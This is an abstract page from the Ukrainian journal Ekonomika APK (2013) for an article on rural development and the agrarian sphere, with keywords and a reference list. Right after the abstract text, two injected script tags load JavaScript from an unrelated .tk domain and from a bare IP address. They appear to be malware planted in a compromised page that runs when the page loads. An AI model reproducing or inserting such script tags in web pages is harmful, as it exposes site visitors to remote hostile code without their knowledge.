ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 911.373:338.43(477)
Розвиток сільських територій і соціальна сфера села

Rural development as the result of proper functioning of agrarian sphere of rural territories / // Ekonomika APK. - 2013. - № 1 - P. 77

In the article the role of socio-economic approach towards overcoming of the simplistic understanding of rural development is considered. The comparative analysis of the scientific concepts of "rural development", "development of rural territories" and "development of the agrarian areas" is carried out. It is defined that rural development deals not only with agrarian development, but also with development of other areas of economy as well. The dependence of rural development on the functioning of rural territories and agrarian areas is proved. Figs: 3. Refs: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: agrarian development, agrarian areas, outer agrarian development, rural development, development of rural territories

References

  1. Геєць В. Соціоекономічна модернізація аграрного сектора України (концептуальні положення) / В.Геєць, В.Юрчишин, О.Бородіна, І.Прокопа // Економіка України.- 2011.- №12 (599). - С. 4-14.
  2. Зіновчук Н.В. Державне регулювання функцій земельних ресурсів, що використовуються в аграрній сфері / Н.В. Зіновчук //Трансформація земельних відносин до ринкових умов: збірник матеріалів Одинадцятих річних зборів Всеукраїнського конгр. вчених економістів-аграрників, Київ, 26-27 лют. 2009 р.; редкол.: П.Т.Саблук та ін. - К.: ННЦ «ІАЕ», 2009. - С. 254-257.
  3. Ключевсъкий В.О. Сочинения: в 9 т. / В.О.Ключевский; под ред. В.Л.Янина; послесл. Р.А. Киреевой; коммент. сост. В.Г.Зимина, Р.А.Киреева. - М.: Мысль, 1989. - T.VI: Спец. курсы. - 476 с.
  4. Павлов О. Сільський розвиток: об’єктність, просторові межі та суспільне призначення / О.Павлов // Економіка України. - 2011. - №8(597). - С. 78-89.
  5. Павлов О.І. Сільські території України: функціонально-управлінська модель : монографія / О.І. Павлов. - Одеса: Астропринт, 2009. - 344 с.
  6. Попова О. Агросфера: соціоекономічний зміст і засади сталого розвитку / О.Попова // Економіка України. - 2012. - №5(604). - С. 73-84.
  7. Сталий розвиток та безпека агропродовольчої сфери України в умовах глобалізаційних викликів: монографія / Павлов О.І., Хвесик М.А., Юрчишин В.В.; за ред. О.І. Павлова. - Одеса: Астропринт, 2012. - 760 с.
  8. Созінов О. Агросфера України у XXI столітті [Електронний ресурс]. / О.Созінов - Режим доступу: http//www.nbuv.gov.ua/portal/all/herald/2001-10/3.htm
  9. Топчіев О.Г. Суспільно-географічні дослідження: методологія, методи, методики: навч. посіб. / О. Г. Топчієв. - Одеса: Астропринт, 2005. - 632 с.
  10. Хорунжий М.И. Аграрна сфера і сільська економіка: суть, взаємозв’язок, проблеми розвитку / М. Й. Хорунжий // Інституціональні засади трансформацій в аграрній сфері: збірник матеріалів Тринадцятих річних зборів Всеукраїнського конгр. вчен. економістів-аграрників, Київ, 20-21 черв. 2011 р.; редкол : П. Т. Саблук та ін. - К.: ННЦ «ІАЕ», 2011. - С. 439 - 47.
Read article: 13_01_11.pdf